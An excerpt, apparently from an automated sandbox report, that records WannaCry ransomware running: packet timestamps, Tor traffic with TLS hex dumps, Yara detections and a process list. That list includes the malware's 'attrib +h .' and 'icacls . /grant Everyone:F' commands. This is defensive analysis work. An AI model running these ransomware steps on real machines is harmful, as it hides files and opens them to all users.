                                                                              Oct 4, 2024 08:44:35.475725889 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.475733042 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.475770950 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.475783110 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476453066 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476473093 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476476908 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476516962 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476537943 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476625919 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476634979 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476639032 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476644993 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476684093 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476717949 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476768970 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476807117 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476813078 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476818085 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476846933 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476866007 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.476950884 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476964951 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.476978064 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.477006912 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.477034092 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.477078915 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.477085114 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.477134943 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.478054047 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478082895 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478087902 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478136063 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.478149891 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478154898 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478159904 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.478188992 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.478307009 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478317022 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478353024 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478358984 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.478368044 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.478401899 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.479423046 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479547977 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479557991 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479571104 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479574919 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479585886 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479615927 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.479638100 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.479808092 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479914904 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.479928017 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479938984 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479969025 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.479975939 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.480792046 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480820894 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480827093 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480873108 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.480953932 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480961084 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480973005 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.480979919 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481004953 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481021881 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481107950 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481113911 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481157064 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481255054 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481261969 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481275082 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481280088 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481285095 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481311083 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481324911 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481486082 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481492996 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481504917 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481511116 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481518984 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481530905 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481535912 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.481556892 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481581926 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.481581926 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.482134104 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482166052 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482172012 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482198954 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482204914 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482217073 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482222080 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.482223034 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.482275009 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.482286930 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.482933044 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486571074 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486577988 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486588955 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486738920 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486745119 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486749887 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486754894 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486881971 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486887932 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486886978 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.486901045 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486907005 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486912966 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.486932039 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.486957073 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487066984 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487124920 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487207890 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487221956 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487227917 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487241030 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487242937 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487245083 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487256050 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487262011 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487262964 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487276077 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487289906 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487315893 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487493992 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487504959 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487510920 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487517118 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487524033 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487535954 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487540960 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.487556934 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.487575054 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.488195896 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488208055 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488214970 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488256931 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.488276005 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.488311052 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488317966 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488348007 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488354921 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.488384008 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.488396883 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.536257029 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565727949 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565762997 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565768957 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565783978 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565836906 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.565860033 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565866947 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.565934896 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566000938 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566014051 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566018105 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566020966 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566095114 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566096067 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566270113 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566277027 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566288948 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566294909 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566301107 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566308022 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566313982 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566323042 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566329002 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566343069 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566363096 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566464901 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566622972 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566632986 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566636086 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.566694975 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.566824913 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567584991 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567595959 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567617893 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567625999 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567640066 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567646980 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567661047 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567677021 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567698956 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567698956 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567698956 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567723989 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567766905 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567785025 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567873955 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567882061 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567894936 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567900896 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567914009 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567915916 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567920923 CEST944449726185.32.222.237192.168.2.17
                                                                              Oct 4, 2024 08:44:35.567935944 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.567969084 CEST497269444192.168.2.17185.32.222.237
                                                                              Oct 4, 2024 08:44:35.568936110 CEST497269444192.168.2.17185.32.222.237
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1749725171.25.193.9806940C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 4, 2024 08:44:24.458076954 CEST204OUTData Raw: 16 03 01 00 c7 01 00 00 c3 03 03 26 f3 40 ee d3 f7 4a 44 d1 90 b9 10 d3 c4 8f e5 01 fc d8 7b ad 97 46 06 2c 5f cc a1 bc 5e 10 28 00 00 30 c0 2b c0 2f c0 0a c0 09 c0 13 c0 14 c0 12 c0 07 c0 11 00 33 00 32 00 45 00 39 00 38 00 88 00 16 00 2f 00 41
                                                                              Data Ascii: &@JD{F,_^(0+/32E98/A5jwww.qx5y.com#
                                                                              Oct 4, 2024 08:44:25.146260977 CEST1013INData Raw: 16 03 03 00 39 02 00 00 35 03 03 ff 0e 81 ef e0 8e 7d 42 63 e4 82 23 a6 5d 16 c6 f6 01 2b 68 25 ff b0 c4 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 57 0b 00 02 53 00 02 50 00 02 4d 30 82 02 49 30
                                                                              Data Ascii: 95}Bc#]+h%DOWNGRD/WSPM0I0s<<0*H0$1"0 Uwww.zxd6kfqofu3i3ctzj.com0240809000000Z241017235959Z0%1#0!Uwww.orckmzxacfrgntkn52.net0"0*H
                                                                              Oct 4, 2024 08:44:25.249840021 CEST126OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 5b f2 4a 6a 91 e2 ee 7a 3f f3 c8 d1 87 d3 7d 53 da 59 1f 06 60 4f 83 39 d5 bc 0b 46 03 d2 57 5e 8b 60 81 21 72 83 19 07 65 73 f4 9c a8 cd a8 a9 77 d9 f4 15 76 dc 88 2a b9 f7 ab bb f8 73 f0 bf 14 03 03 00 01 01 16
                                                                              Data Ascii: FBA[Jjz?}SY`O9FW^`!reswv*s(S"V6d&yKPbsTGB}%
                                                                              Oct 4, 2024 08:44:25.721179008 CEST51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 33 6e 22 d9 f2 42 fc b4 4a ec 2f b6 2b 2c 06 72 0c dc d5 19 9a 72 36 2f f5 4e cf 51 84 84 33 75 02 43 33 b4 8b 89 52 2b
                                                                              Data Ascii: (3n"BJ/+,rr6/NQ3uC3R+
                                                                              Oct 4, 2024 08:44:25.721498013 CEST38OUTData Raw: 17 03 03 00 21 53 22 fa 95 56 11 ed 37 d9 6b ea 1a 34 0b 2a 2e d0 a6 25 01 cb 95 84 4c 30 34 71 52 2e bc 90 88 62
                                                                              Data Ascii: !S"V7k4*.%L04qR.b
                                                                              Oct 4, 2024 08:44:26.302583933 CEST1236INData Raw: 17 03 03 08 17 33 6e 22 d9 f2 42 fc b5 86 20 9c 60 05 fb 96 62 76 f5 1b 73 df 22 58 1f 9b 69 98 f3 9c b5 8b 45 32 a7 f3 b9 06 c6 9f b5 26 38 d1 cb fa 7e 2f 73 0d 3e df 84 7a 92 d5 7e 40 62 e0 27 d8 68 e4 ca 1e 01 a1 25 dc d3 2f 78 0a 21 47 2e af
                                                                              Data Ascii: 3n"B `bvs"XiE2&8~/s>z~@b'h%/x!G.wd*L>jelui&2rh#y)<>-qB`trT8#_;5*~1-FZ["gxH1{nRV=U71hZ'=D%zGlX%
                                                                              Oct 4, 2024 08:44:26.302958012 CEST840INData Raw: 2f 2c 83 02 22 28 f1 24 e0 27 3d 8b e9 20 48 90 e4 7c d6 fe 00 ff 5a 53 00 5f d7 f0 1d 52 73 ba 0c 37 65 1e a9 27 40 a1 84 98 de 5c f2 4a 80 3b f1 da 32 22 56 4b 41 64 b7 f5 e2 48 2c 14 5d 02 04 d1 51 b9 93 24 25 fa b6 4f f4 ca bb da 2b e2 71 2b
                                                                              Data Ascii: /,"($'= H|ZS_Rs7e'@\J;2"VKAdH,]Q$%O+q+Cx.GAEfx^lPgE}$rX\"Ll2sE"q&+bOq JdlsHh0gI4F ]]A-jS@EA
                                                                              Oct 4, 2024 08:44:26.375966072 CEST1057OUTData Raw: 17 03 03 04 1c 53 22 fa 95 56 11 ed 38 43 a5 b9 fa 34 64 96 72 c3 98 b1 83 b0 f5 ed 1b e9 16 66 97 34 ea a7 06 9b a0 b1 28 0f 2d 85 7a 85 30 e3 09 c8 28 64 e0 53 fc 0e 2e e2 5f e0 95 54 28 b6 15 b8 a8 68 67 b4 ef c1 a0 20 c4 61 d1 c5 7b 18 7b 4b
                                                                              Data Ascii: S"V8C4drf4(-z0(dS._T(hg a{{KHTDT~0I!oioib4zQd:L|oGZ/nRLY]c'0|)+H8)UCSQcd^H-P x#j:LH-~@4xkQO(=
                                                                              Oct 4, 2024 08:44:26.600922108 CEST543INData Raw: 17 03 03 02 1a 33 6e 22 d9 f2 42 fc b6 e4 7e 19 4b 7c 75 4d 75 12 f7 36 e0 38 8f b0 87 e4 ca 59 66 7c 2b fe de f2 58 ae fd 0d e7 d6 df b8 14 9e 33 c6 11 92 5c fb 83 44 d7 07 8a db 48 0d 99 de d1 d4 b6 b6 a1 3a e6 14 92 45 3e a5 6f 2b e4 f8 b4 7e
                                                                              Data Ascii: 3n"B~K|uMu68Yf|+X3\DH:E>o+~6S|bM/$o,(t2"_ =?u?7+E{b7DA^P-G(cx_B(_%w8#&]K5z~ T+p
                                                                              Oct 4, 2024 08:44:26.616498947 CEST1057OUTData Raw: 17 03 03 04 1c 53 22 fa 95 56 11 ed 39 0d 02 c7 1f 39 f4 d4 a8 7a fb 53 94 fb 28 f4 fb 00 20 25 61 a6 32 11 ad b2 62 d7 09 68 d6 0e 5b ef 36 b2 69 6b a4 00 34 d9 75 b8 29 6a 4b 85 9d 96 71 95 35 cf b2 04 5f 86 54 c6 94 38 54 a9 d2 fb 4d 07 c4 49
                                                                              Data Ascii: S"V99zS( %a2bh[6ik4u)jKq5_T8TMIGWN&Z#D&'h.Qg,2/LTr{hiiy-J +C1+u||*7<TFw"^%J:Q=s*8#X=1z;"3 Vg


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:42:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                              Imagebase:0x7ff753e20000
                                                                              File size:71'680 bytes
                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:02:43:02
                                                                              Start date:04/10/2024
                                                                              Path:C:\Program Files\7-Zip\7zG.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap23742:84:7zEvent9207
                                                                              Imagebase:0x340000
                                                                              File size:700'416 bytes
                                                                              MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:02:43:19
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\WannaCry.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\WannaCry.exe"
                                                                              Imagebase:0x400000
                                                                              File size:3'514'368 bytes
                                                                              MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000F.00000000.1444934334.000000000040E000.00000008.00000001.01000000.00000008.sdmp, Author: us-cert code analysis team
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:16
                                                                              Start time:02:43:19
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:attrib +h .
                                                                              Imagebase:0xc50000
                                                                              File size:19'456 bytes
                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:02:43:19
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:icacls . /grant Everyone:F /T /C /Q
                                                                              Imagebase:0xa0000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:02:43:19
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:02:43:19
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                              Imagebase:0x7ff6f3f20000
                                                                              File size:19'776 bytes
                                                                              MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:02:43:20
                                                                              Start date:04/10/2024
